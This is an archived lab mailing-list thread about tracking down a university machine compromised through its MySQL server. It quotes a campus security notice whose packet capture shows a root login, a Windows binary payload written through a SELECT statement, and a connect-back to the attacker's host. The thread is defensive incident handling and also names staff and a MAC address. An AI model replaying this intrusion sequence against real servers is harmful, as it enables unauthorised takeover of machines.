[4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised via its MySQL server

Adam Ibrahim adam.ibrahim.fr at gmail.com
Fri Jan 20 15:16:15 PST 2017 

We found it ! IT'S PETER I'M WITH HIM RIGHT NOW I'M GOING TO PRETEND I
DON'T KNOW ANY...

On 20 Jan 2017 15:06, "Matthew Turk" <mturk at cs.ucsb.edu> wrote:

> Thanks for checking. Scott said that the MAC address is 00:21:9b:05:e7:48
> and it is a Dell computer. It seems to be currently off but was on
> Wednesday. It should also be a wired connection – unless we have a router
> in the trailer (do we?).
>
>
>
>                 Matthew
>
>
>
> *From:* Adam Ibrahim [mailto:adam.ibrahim.fr at gmail.com]
> *Sent:* Friday, January 20, 2017 3:00 PM
> *To:* Matthew Turk <mturk at cs.ucsb.edu>
> *Cc:* ilab-users at lists.cs.ucsb.edu
> *Subject:* Re: [4eyes] [COE #74336] [UCSB-OIT #942765] 128.111.28.118:
> was compromised via its MySQL server
>
>
>
> Hey Matthew, we checked all the machines that were on when it happened and
> couldn't find the culprit. There are a couple machines that have been
> turned off for a week (the ones Brandon and I tried salvaging) but they
> won't boot as there's no os and one's HDD looks dead. Do they know the mac
> address of the machine we're looking for ? None had that IP but IP can
> change and none was blocked from the network. If it weren't for the hp
> printer drivers I'd suspect someone out of the lab connected to our wifi.
> Adam
>
>
>
> On 20 Jan 2017 14:51, "Matthew Turk" <mturk at cs.ucsb.edu> wrote:
>
> Update on this:  Scott says the machine is in the trailer, and it's a
> Windows machine. So I need someone to please check the IP address of every
> Windows machine in the trailer - looking for 128.111.28.118. I expect there
> are orphaned machines that no one has checked.
>
> Is anyone there this afternoon to do this ASAP?
>
> Thanks,
>         Matthew
>
>
> -----Original Message-----
> From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
>
> Sent: Thursday, January 19, 2017 5:59 PM
> To: ilab-users at lists.cs.ucsb.edu
> Subject: RE: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was
> compromised via its MySQL server
>
> No one has claimed this machine yet. Please check yours and let me know.
> (There are usual suspects here, but I won't name names!)
>
>         Matthew
>
> -----Original Message-----
> From: Matthew Turk [mailto:mturk21 at gmail.com] On Behalf Of Matthew Turk
> Sent: Wednesday, January 18, 2017 9:20 PM
> To: ilab-users at lists.cs.ucsb.edu
> Subject: FW: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was
> compromised via its MySQL server
>
> Whose machine is 128.111.28.118? Please check - if it's yours, please let
> me know and see the info below.
>
> Thanks,
>         Matthew
>
> -----Original Message-----
> From: Tier II Support Issues via CoE Support [mailto:
> help at engineering.ucsb.edu]
> Sent: Wednesday, January 18, 2017 10:41 AM
> To: holl at cs.ucsb.edu; mturk at cs.ucsb.edu
> Subject: [COE #74336] [UCSB-OIT #942765] 128.111.28.118: was compromised
> via its MySQL server
>
> The following reply has been made regarding CoE Support ticket #74336:
>
> Hi Matt and Tobias,
>
> OIT has sent us this warning about ilab-118 machine that is compromised
> and needs to be looked into. Please read the information below.
>
> On Wed Jan 18 10:24:26 2017, security at ucsb.edu wrote:
> > Greetings,
> >
> > 128.111.28.118 has been compromised and has been blocked. The host was
> > compromised via its MySQL server.
> >
> > Before correcting any problems, please consider whether any sensitive
> > personal information is stored on this device. If this device contains
> > personal information and if it appears to have been compromised,
> > please contact the UCSB Chief Information Security Officer, at
> > CISO at oist.ucsb.edu or 893-5005 immediately.
> >
> > To view the UCSB procedures when a device storing personal information
> > has been compromised, please visit:
> > http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline
> >
> > Please investigate and advise. Here is a sample of traffic from the
> > trojan:
> >
> > ----------sample----------
> > T 2017/01/18 02:45:47.091988 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > ......
> >
> > T 2017/01/18 02:45:47.497391 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > J...
> > 5.5.11..+..EV``AdUY...!...............B~tMc*DXpHVW.mysql_
> native_password.
> >
> > T 2017/01/18 02:45:47.684113 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> >
> V.......... at ........................root......Ndy....3......
> ;.mysql.mysql_native_password.
> >
> > T 2017/01/18 02:45:47.684972 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > ...........
> >
> > T 2017/01/18 02:45:47.878832 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SELECT @@max_allowed_packet;
> >
> > T 2017/01/18 02:45:47.899132 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> >
> .....*....def....@@max_allowed_packet..?.............
> ............1048576.........
> >
> > T 2017/01/18 02:45:48.088029 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SHOW VARIABLES LIKE 'VERS%';
> >
> > T 2017/01/18 02:45:48.287569 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [A]
> > ......
> >
> > T 2017/01/18 02:45:48.331489 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> >
> .....T....def.information_schema.VARIABLES.VARIABLES.
> Variable_name.VARIABLE_NAME... at .........M....def.
> information_schema.VARIABLES.VARIABLES.Value.VARIABLE_
> VALUE...................."......version.5.5.11-
> > ....version_comment.MySQL Community Server
> > (GPL).....version_compile_machine.x86.....version_
> compile_os.Win64.......".
> >
> > T 2017/01/18 02:45:48.682703 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > ......
> >
> > T 2017/01/18 02:45:50.427705 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> >
> > ....USE MYSQL
> >
> > T 2017/01/18 02:45:50.428403 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > ...........
> >
> > T 2017/01/18 02:45:50.613848 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SELECT @@version_compile_os;
> >
> > T 2017/01/18 02:45:50.614481 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> >
> .....*....def....@@version_compile_os....................
> ........Win64.........
> >
> > T 2017/01/18 02:45:50.800022 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> > .....SELECT @@plugin_dir;
> >
> > T 2017/01/18 02:45:50.800759 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [AP]
> > ....."....def....@@plugin_dir....2..................3...2C:\Program
> > Files\MySQL\MySQL Server 5.5\lib/plugin.........
> >
> > T 2017/01/18 02:45:50.990204 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > .l...SELECT
> >
> 'MZ.\0.\0\0\0.\0\0\0..\0\0.\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.\0\0\
> 0....\0...!..L.!This
> > program cannot be run in DOS
> >
> mode.\r\r\n$\0\0\0\0\0\0\0....[...[...[...R.\".G...R.%.3...
> R.5.\\...[...1...R.3.P...R./.Z...R.4.Z...R.7.Z...Rich[...\
> 0\0\0\0\0\0\0\0PE\0\0d..\0?..M\0\0\0\0\0\0\0\0.\0\"
> >
> ...\0\0.\0\0\0V\0\0\0\0\0\0D.\0\0\0.\0\0\0\0\0..\0\0\0\0.\0\
> 0\0.\0\0.\0.\0\0\0\0\0.\0.\0\0\0\0\0\0..\0\0.\0\0...\0.\0\
> 0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\0\0\0.\0\0\0\0\0\0.\0\0\0\0\
> 0\0\0\0\0\0.\0\0\0...\0..\0\0...\0P\0\0\0\0`.\0..\0\0\0P.\0.
> .\0\0\0\0\0\0\0\0\0\0\0p.\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0.\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0.text\0\0\0p.\0\0\0.\0\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0
> >
> \0\0`.rdata\0\0..\0\0\0.\0\0\00\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0@
> .data\0\0\0.5\0\0\0..\0\0.\0\0\0.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@
> \0\0..pdata\0\0!
> >
> ..\0\0\0P.\0\0\n\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0 at .
> rsrc\0\0\0..\0\0\0`.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\0@
> .reloc\0\0..\0\0\0p.\0\0.\0\0\0..\0\0\0\0\0\0\0\0\0\0\0\0\0@
> \0\0B\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
> >
> > T 2017/01/18 02:45:50.990462 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> >
> \0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
> 0\0\0\0\0.:\0tPH..D.\0\0I.\0H..B.\0\0I. at .H..?.\0\0I. at .H..<.\0\0I.@
> .H..9.\0\0I.@
> >
> H..6.\0\0I.@(...3.\0\0fA. at 0...2..........H..!.\0\0I.\0H....\0\0I.@
> .H....\0\0I. at ...\Z.\0\0A. at ......\0\0fA. at ......\0\0A.
> @.A...\0\0\0I........:.u.H.B..8\0u....2..H....\0\0I.\0H....\0\0I.@
> .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> > .....\0\0fA.@(.....\0\0A.@*................\0\0............. at SH..
> > H.J.I..H.....\0\0L..H..u.H.L$P...H..
> > [.H.|$03.H...I....H.|$0I..H..H....H.. [................H.\\$.WH..
> >
> .:.I..H..tUH.\rT...H....\0\0I.\0H....\0\0I. at .H....\0\0I. at .....\0\0A.@
> ......\0\0fA. at ......\0\0A. at ...H.\\$0H..
> >
> _.H.B..8\0tJH.\r....H....\0\0I.\0H..\0.\0\0I. at .H....\0\0I. at .H....\0\0I.@
> .H....\0\0I.@
> > ..H.\\$0H.. _.. at .\0\0\!
> > 0\0H.B..H..\0.L.....\0\0H.G.H..u?H.\r....H..
> > .\0\0H..H..(.\0\0H.C.H..0.\0\0H.C....8.\0\0f.C...H.\\$0H..
> > _.2.H.\\$0H..
> > _......H..(H.I.H..t..^.\0\0H..(..........H.\\$.H.t$.WH..
> >
> H.B.H.q.H..H.R.D.\0H..H..I.\\0....\0\0L._.H..A....0\0H.G.H.W.D.@
> .H.R..\\.\0\0L._.H..A.C.H.....\0....\0\0H.\\$0H.t$8H.H..
> >
> _...H..(H.J.H.....\0\0H.H..(...........:.u.H.B..8\0u.2..H...
> .\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> > .....\0\0fA.@(.....\0\0A.@*..................H.t$ WATA
> >
> > T 2017/01/18 02:45:50.990557 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > VH.. .\0.\0\0H.l$HM..L.l$PH...`.\0\0..\0\0\0L...S.\0\0E3.H..\r.\0\0D.
> >
> H.O.H..H.....\0\0A.T$.I..L..H...p.\0\0H..tYH.\\$@f.H...3.I..
> ..H..B.\\!.H.y.H.....#.\0\0A..D..H..I..H.....\0\0L....\0\0\
> 0I..D.....\0\0H..u.H.\\$@H....\r\0\0.>\0L.l$PH.l$Ht/H...A.D$
> .H....0\03...H..H..H..A..H.t$XH..
> > A^A\\_.H.D$`.\0.H..H.t$XH..
> >
> A^A\\_...............H.\\$.H.t$.WH..0H.z.H...3.H.?H..D.H at ..
> A.\0.\0\0H..H..H.y.3.....\0\0H.V.L..H..H..H.....\0\0H.T$
> HL..B\0\0\0H.T$(L..3.3..D$
> >
> \0\0\0\0....\0\0...H......\0\0H.\\$@H.t$P3.H..0_...........
> H..(.\'.\0\0.\03.H..(............... at UVATH....\0\0H..\r.\0\
> 0H3.H..$..\0\0H.....H.L$xD.EaE3.3.D.d$p.d(\0\03.H.D$XH.D$
> `L.d$PH......\0\0H..$..\0\0H..$..\0\0L..$..\0\0A..\0\0\0H..$
> .\0\0\0A....k.\0\0.^...>H.....\0\0.U.D.E.E3.A..D.d$(D.d$
> >
> ..h.\0\0...H..3.H..$.\0\0\0fD..$.\0\0\0..$.\0\0\0H..$.\0\0\
> 0..\".\0\0D.E.H..$.\0\0\0H..f..$.\0\0\0....\0\0H..$..\0\0H..
> $..\0\0.....\0\0\0H.L$p..:.\0\0H..$..\0\0H.\r3.\0\0A...\0\0.
> D$ph\0\0\0..$.\0\0\0..\0\0fD..$.\0\0\0H..$.\0\0\0H..$.\0\0\0H..$.!
> >
> \0\0\0....\0\0....x\0\0\0H.D$PH..$..\0\0E3.H.D$HH.D$pE3.H.
> D$@L.d$8L.d$03..D$(.\0\0\0.D$
> >
> .\0\0\0....\0\0..t0A..H.L$P...\0\0....\0\0=..\0\0t.H.L$P..~.
> \0\0H.L$X..s.\0\0A..H......\0\0H......\0\0L..$..\0\0..H..$..
> \0\0H3....\0\0H....\0\0A\\^]..........:.u.H.B..8\0u..x.\0u.
> 2..H..\Z.\0\0I.\0H....\0\0I. at .H....\0\0I. at .H....\0\0I. at .H....\0\0I.@
> >
> .....\0\0fA.@(.......H.\\$.WH..0..\0\0\0H....\n\0\0H..H..
> tUH.O.H....<.\0\0.C.H.O.H.I....\0\0L..-
> > ...L..f..3.3.H.D$(3..D$ ..z.\0\0H....i.
> >
> > T 2017/01/18 02:45:50.990690 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> >
> \0\03.H.\\$@H..0_.H..\0\0\0\0\0\0\0H.\\$@H..0_........2.....
> ..........H.\\$.WH..PH.D$0....3..D$8.\0\0\0.D$D.\0\0\0..5.\
> 0\0L.D$0.W(H......\0\0.....\0\0\0L.D$<H....\0\03.....\0\0...
> .tHH.L$0L.D$8E3.3.H.|$(H.|$
> > ....\0\0....t#D.O.E3.3.3..D$
> >
> .\0\0\0..d.\0\0....t.\0\0..H.L$0....\0\0..[.\0\0t...t\r3.H.
> \\$`H..P_.H..\0\0\0\0\0\0\0H.\\$`H..P_..UH..H.E.............
> ..ff...\0\0\0\0\0H;\r..\0\0u.H...f....u...H....U.\0\0.H..t7SH..
> > L..H.\r...\03...L.\0\0..u....\0\0H......\0\0...k.\0\0..H..
> >
> [....H..(L...\n.\0D...\n.\0M..I..I...M..M;.s.H9\nt.H...I;.r.
> I;.s.H...VH..uOA. at .A;.rF..H.........H;.s5D.A.I...e.\0\0L..H.
> .t!.\r[\n.\0H..\\\n.\0H..H...I.....\rB\n.\0..3.H..(..H..H.
> X.H.H.VWATAUAVH..0.\0\0L..3.L..H.\\$h.X..X..X\Z.\\$`..H;....
> ;.u&...\0\0.\0.\0\0\0H.\\$
> > E3.E3.3.3....\0\03....\0\0..H;....;.u&...\0\0.\0.\0\0\0H.\\$
> > E3.E3.3.3....\0\03....\0\0.
> > 8\nu...\0\0\0H..8\nt.....\0\0\0..<wt*<rt&.P.\0\0.\0.\0\0\0H.\\$
> >
> E3.E3.3.3..Z.\0\03....\0\0..$p.\0\0H..8\nu.H..8\nt...:.t.<
> tt*<bt&...\0\0.\0.\0\0\0H.\\$
> > E3.E3!
> >
> .3.3....\0\03..:.\0\0..$q.\0\0<tu.A.\0@\0\0..D...\0.\0\0<
> bD.D.A.....\0.\0\0H.L$X..*\0\0.......\0\0..$p.\0\0wu...D...
> .$x.\0\0.t$P....D....$x.\0\0.\\$P..\0\0\0..\Z\0\0;.u..L$X.Y)
> \0\0.L$\\.P)\0\03....\0\0..\0\0\0...\0\0..t$t.t$p....\0\0Ic.
> HcL.XH..H...L...&.\0...Hk.XI....D$0.\0\0\0.t$(.d$
> >
> \0L..$.\0\0\0L..H..\nH....z.\0\0......\0\0.L.X..(\0\0.d.p\
> 0HcD$PH..$p.\0\0.L.X.\Z\"\0\0L..H..$.\0\0\0H......\0\03...
> ...H..$.\0\0\0H......\0\0L....\0\03.H.L$h.+\r\0\0....t\Z...u.H.d$
> > \0E
> >
> > T 2017/01/18 02:45:50.990877 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > 3.E3.3.3..c.\0\0..u\nL.l$hM..u.L.-..\0\0.h\0\0\0L..3.H..$.\0\0\0..
> >
> \0\0..$.\0\0\0..$.\0\0\0\0.\0\0..u.H..$.\0\0\0H..H.\r.%.\0..
> H.\r.%.\0H..H..$.\0\0\0H..$..\0\0;.t.H.AXH..$..\0\0H...\0\0\0H..$
> >
> .\0\0I...x.\0\0H..I...m.\0\0H..H.\r..\0\0.^.\0\0H.\\..H..H..
> ...\0\0L..3.H;.....\0\0M..H..H.....\0\0;.t.H.|$
> > E3.E3.3.3..n.\0\0L....\0\0H..I.....\0\0;.t.H.|$
> > E3.E3.3.3..D.\0\0L..$`.\0\0H..I.....\0\0;.t.H.|$
> >
> E3.E3.3.3....\0\0...\0\0....$`.\0\03.I...\r.\0\0;.uEH..$.\0\
> 0\0H.D$HH..$.\0\0\0H.D$@H.|$8H.|$0.|$(.t$
> > E3.E3.I..I......\0\0...D.\0\0H.|$xH.....\0\0...\0\0H..H..u-
> >
> 3......I.......H.L$h........\0\0..D..$x.\0\0.l.\0\0L....\0\
> 03.H.L$x...\0\0....t\Z...u.H.d$
> >
> \0E3.E3.3.3..>.\0\0..t?H.L$x.L...H...D...I...<...H.L$h.2...
> ...\0\0..$`.\0\0..D..$x.\0\0...\0\0H.L$x3.A...\0\0H...6.\0\
> 0H..$.\0\0\0H;...<.\0\08.....\0\0H...q.\0\0H.\\8..;\\uA.\\\
> 0\0\0H....\Z\0\0H;.taL....\0\0...\0\0H...1.\0\0..tIH.d$
> > \0E3.E3.3.3..|.\0\0.2.;/t-L....\0\0...\0\0H.....\0\0..t.H.d$
> > \0E3.E3.3.3..H.\0\0I.....\0\0H..H.....\0\0H..!
> > ...\0\0H;....\0\0\0M..H..H.....\0\03.;.t.H.\\$
> >
> E3.E3.3.3....\0\03.H....\Z\0\0;.uBH..$.\0\0\0H.D$HH..$.\0\
> 0\0H.D$@H.\\$8H.\\$0.\\$(.t$
> >
> E3.E3.I..H......\0\0....H..$.\0\0\0......t$`.\n.t$`...t$`H.
> L$x.....H.........$`.\0\03.I.......H.L$h.~...H..$.\0\0\0....
> \0\0H..$.\0\0\0..r.\0\0.E.\0\0..;.t.H..$.\0\0\0H..$.\0\0\
> 0H.A.L.1.mH..$.\0\0\0H.9D..$x.\0\0..D..$x.\0\0I...1.\0\0Hc|$
> P.d.p\0E3.L..$.\0\0\0.\n.|$P...|$PIc..|.p\0t..L.X..#\0\0Hc..
> |.p\0t\n.L.X..#\0\0...\0\0\0...\0\0I..H..
> >
> > T 2017/01/18 02:45:50.990879 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [AP]
> >
> $h.\0\0H..0.\0\0A^A]A\\_^.H.t$.H.|$.ATH..0L..H...3.H.......
> u\'.l\r\0\0.\0.\0\0\0H.d$
> >
> \0E3.E3.3.3..u.\0\0....\0\0\0..\0\0\0...\0\0..u.....\0\0\0..
> \0\0\0...\0\0.I...z...H..H..u\r..\r\0\0.\0.\0\0\0.PI...5.\0\0.\0\r\0\0D.
> > ...\0\0.
> > \0A..\0\0\0H.V.H.L$@.9\'\0\0H;.u\n...\0\0.8.u..|$@...\0\0D.
> > H.&\0H.f.\0..\0\0\0...\0\0..H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
> > H..H...w|..\0\0\0H..H.E.H.\r=..\0H..u .k-
> >
> \0\0..\0\0\0.9+\0\0..\0\0\0..\'\0\0H.\r...\0L..3.....\0\0H..
> H..u,9....\0t.H...y-
> > \0\0..t\r...\".\0\0.\0.\0\0\0...\0\0.\0.\0\0\0H.....S-
> > \0\0...\0\0.\0.\0\0\03.H.\\$0H.t$8H..
> >
> _...3.D.B\n../\0\0.H.\\$.WH..PH..L....\0\0H.L$`3.3.H.\\$`.
> Y.\0\0;.t....u.E3.E3.3.3.H.\\$
> >
> ...\0\0H.L$`H.L$0H;.u\ZH;....\0\0\03....\0\0;......\0\0\0H..
> ..\0\0H.|$@H.\\$HH.D$8H;.tM.O.\0\0.8.H.\0\0L.D$0..H.T$0E3.3.
> ..3\0\0.....t..&.\0\0.8.8...\0\0.8.t\n...\0\0.8\ru$...\0\0.
> 8H..p.\0\0L.D$0E3.3.H.T$0.
> > /\0\0..H.L$`.......H.\\$hH..P_.....
> >
> > T 2017/01/18 02:45:50.991064 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [A]
> > ......
> >
> > T 2017/01/18 02:45:50.991120 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> >
> .............ff...\0\0\0\0\0L..M..t$H+....t(..........\0\0\
> 0H..I..t....u...I...H...H...H..I...r&I........~L..L..I...M3.
> I.\0.......M..t.I......\0\0\0........\0\0\0H..I..tx...$.tuH.
> .I..tiH........tbH..I..tV...$.tSH..I..tGH........t at H..I..t4.
> ..$.t1H..I..t%........t.H..I..t....$.t.H..I....<...I...H..
> H3.I...rE...t\nH....I....I..
> > r.H..H.Q.H.Q.H.Q.H.. I.. s.I..
> >
> I...r.H..H.....I...I...r...H....I..... at SVWATAUH..@I....L..L.
> .H..H..u*..t&.,.\0\0.\0.\0\0\0H!t$
> > E3.E3.3.3..6.\0\03....\0\03........u\'...\0\0.\0.\0\0\0H.d$
> > \0E3.E3.3.3....\0\03..Y.\0\03.H.......u\'...\0\0.\0.\0\0\0H.d$
> >
> \0E3.E3.3.3...\n\0\03..&.\0\0..u.3....\0\0H..$.\0\0\0H....3\0\0..C.@
> ...\0\0\0H...P6\0\0...t*...t%Hc.H..H...L.....\0...
> Hk.XI...H.\r..\0\0..H.\r..\0\0H..L.....\0.B8.u%...t\Z...t.
> Hc.H..H......Hk.XI....A8.t\'...\0\0.\0.\0\0\0H.d$
> >
> \0E3.E3.3.3...\n\0\03.H.t$0H..tV....|$xtH.C..x.H.....H..H...
> \nH...84\0\0...L$p...u.M;.u.3.H.t$0..A..$I..L.d$8..\nt...A..
> $\0H....3\0\0H..H.. at A]A\\_^[.H.\\$.H.t$.WH..
> > H..H..H..u\nH........jH!
> >
> ..u..^....\\H...wCH.\r...\0..\0\0\0H..H.D.L..3.L......\0\0H.
> .H..uo9....\0tPH...Q(\0\0..t+H...v.H...?(\0\0...\0\0.\0.\0\
> 0\03.H.\\$0H.t$8H..
> >
> _....\0\0H......\0\0...y.\0\0.......\0\0H......\0\0...`.\0\
> 0..H.....H.\\$.H.t$.WH..
> >
> .=...\0\0H.....\0H..tmH..u.H9....\0t_..5\0\0..uVH.....\0H..
> tJH..tEH.....\0\0H..H..H..t2...\0\0H;.v.H...<9=u.L..H...E5\
> 0\0..t.H.....H..H.D8...3.H.\\$0H.t$8H..
> > _.... at SH..0H..3.H.......u$...\0\0.\0.\0\0\0H.d$
> > \0E3.E3.3.3....\0\03..`...\0\0..6\0\03.H=.
> >
> > T 2017/01/18 02:45:50.991124 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> > .\0\0.....u$...\0\0.\0.\0\0\0H.d$
> >
> \0E3.E3.3.3....\0\03..#..\0\0\0..\r\0\0.H.......H....\0\0\0.
> ..\0\0H..H..0[..H.\\$.H.t$.H.|$.ATH..0I..H..H....\0\0\0..\r\
> 0\0.3.H.......u&.\".\0\0..\0\0\0..H.d$
> > \0E3.E3.3.3..*.\0\0..\0\0\0H.\'\0H..t.H.#\03.H.......u#...\0\0..\0\0\0
> > ..H.d$
> >
> \0E3.E3.3.3....\0\0.zH.......H..H..u.3..fH...Q.\0\0..\0\0\
> 0L.$.I....4\0\0H..H..u....\0\0.\0.\0\0\0...\0\0...1L..I..H.
> ....\0\0..t.H.d$
> > \0E3.E3.3.3..Q.\0\0H..t.L.#3...\0\0\0...\0\0..H.\\$@H.t$HH.|
> $PH..0A\\.. at SH..
> >
> I.....u......\0\0..u.3....\0\0..7\0\0..u....\0\0....=\0\0..
> ..\0\0H.....\0..;\0\0H..\Z.\0\0...\0\0..y..h4\0\0....:\0\0..
> x...7\0\0..x.3....\0\0..u.....\0\0..\0\0\0.i.\0\0....u9....\
> 0\0....z.........\0\09..\0.\0u...!\0\0H..ux.6.\0\0..4\0\0.
> 4.\0\0.g...uV..3\0\0...\0\0..\0\0\0.].\0\0H..H....*....\r..\
> 0\0H......\0\0H....t.3...3\0\0....\0\0H.K.......
> > ...........u.3..O6\0\0..\0\0\0H..
> >
> [.H.\\$.H.t$.H.|$.ATH..0I....L....\0\0\0..u.9...\0\0u.3...\
> 0\0\0...t....u0L.\r&.\0\0M..t.A...D$
> > ..t.L....I...a....D$ .....\0\0\0!
> > L....I....>\0\0...D$
> >
> ...u5..u1L..3.I....>\0\0L..3.I.......L....\0\0M..t.L..3.I..
> A....t....u7L....I...........#....L$
> > t.H....\0\0H..t.L....I.......D$
> > ....3.H.\\$@H.t$HH.|$PH..0A\\.H.\\$.H.t$.WH..
> > I....H.....u...=\0\0L....H..H.\\$0H.t$8H..
> >
> _........H.L$.H...\0\0\0H.\ry.\0\0..c.\0\0L..d.\0\0L.\\$XE3.
> H.T$`H.L$X.K.\0\0H.D$PH.|$P\0tAH.D$8\0\0\0\0H.D$HH.D$0H.D$
> @H.D$(H..$.\0\0H.D$
> >
> L.L$PL.D$XH.T$`3....\0\0.\"H..$.\0\0\0H....\0\0H..$.\0\0\0H.
> ..H..}.\0\0H....\0\0H..G.\0\0H..$.\
> >
> > T 2017/01/18 02:45:50.991425 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [A]
> > ......
> >
> > T 2017/01/18 02:45:50.991744 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [A]
> > ......
> >
> > T 2017/01/18 02:45:51.015642 128.111.28.118:3306 ->
> > 188.132.176.26:3549 [A]
> > ......
> >
> > T 2017/01/18 02:45:51.176555 188.132.176.26:3549 ->
> > 128.111.28.118:3306 [A]
> >
> 0\0\0H..H.\0\0....\0\0..\0.....\0\0.\0\0\0H....\0\0H.D$hH...
> .\0\0H.D$p..n.\0\0....\0\0..\0\0\0.v=\0\03...N.\0\0H.\r..\
> 0\0..9.\0\0.=b.\0\0\0u\n..\0\0\0.N=\0\0....\0\0...\0.H....\
> n.\0\0H...\0\0\0...L.\r9.\0\03.I..D. at .;\nt+..I....-
> >
> r..A....w..\r\0\0\0...D.....\0\0\0...A.F..H.A.D....H..(.o1\
> 0\0H..u.H..K.\0\0..H...H..(.H..(.O1\0\0H..u.H../.\0\0..H...H..(. at SH..
> > ...+1\0\0H..u.H....\0\0..H.......1\0\0L....\0\0H..t.L.P....;...A..H..
> >
> [....L$.H..(E3..\0.\0\03...X.\0\0H..!.\0\0H..t#L.D$0A..\0\0\
> 03.H...D$0.\0\0\0..&.\0\0..\0\0\0H..(.H..(H.\r..\0\0....\0\
> 0H.%..\0\0\0H..(...H.\r..\0\0. at SH....\0\0.d$p\0H.L$t3.A..\0\
> 0\0.L\r\0\0L.\\$pH..$..\0\0H..$..\0\0L.\\$HH.D$P....\0\0H..$
> ..\0\0H.T$@H..E3....\0\0H..t;H.d$8\0H.T$@H.L$`H.L$0H.L$XL..
> H.L$(H..$..\0\0L..H.L$
> > 3..Q.\0\0.
> >
> H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0H..$..\0\0.D$p..\0.
> .D$t.\0\0\0H..$.\0\0\0....\0\03.......\0\0H.L$H....\0\0..u.
> ..u..H...:\0\0..N.\0\0...\0.H......\0\0H....\0\0[....H.\\$.
> H.l$.H.t$.WH..0H..H.\r..\0\0A..I..H... at .\0\0H..t\ZL.T!
> > $`D..L..H..H..L.T$ ...%..\0\0\0.o:\0\0L.\\$`D..L..H..H..L.\\$
> > .h...H.\\$@H.l$HH.t$PH..0_....H.\\$.H.l$.H.t$.WH..
> > 3.H.....H.......H..H..u(9...\0\0v ....
> > .\0\0D....\0\0D;...\0\0A...G.;.u.H.l$8H.t$@H..H.\\$0H..
> > _.H..H.X.H.h.H.p.H.x ATH..
> >
> 3.H..H..A...E3.H..H....9\0\0H..H..u*9...\0\0v\"......\0\0D..
> ..\0\0D;.g.\0\0A..A.G.A;.u.H.l$8H.t$@H.|$HH..H.\\$0H..
> > A\\..H..H.X.H.h.H.p.H.x ATH..
> >
> 3.H..H..A...H..H.......H..H..u/H..t*9...\0\0v\"......\0\0D.
> ...\0\0D;...\0\0A..A.G.A;.u.H.l$
> >
> > T 2017/01/18 02:45:54.767136 128.111.28.118:20138 ->
> > 188.132.176.26:4000 [A]
> > ......
> >
> > T 2017/01/18 02:45:55.049876 128.111.28.118:20138 ->
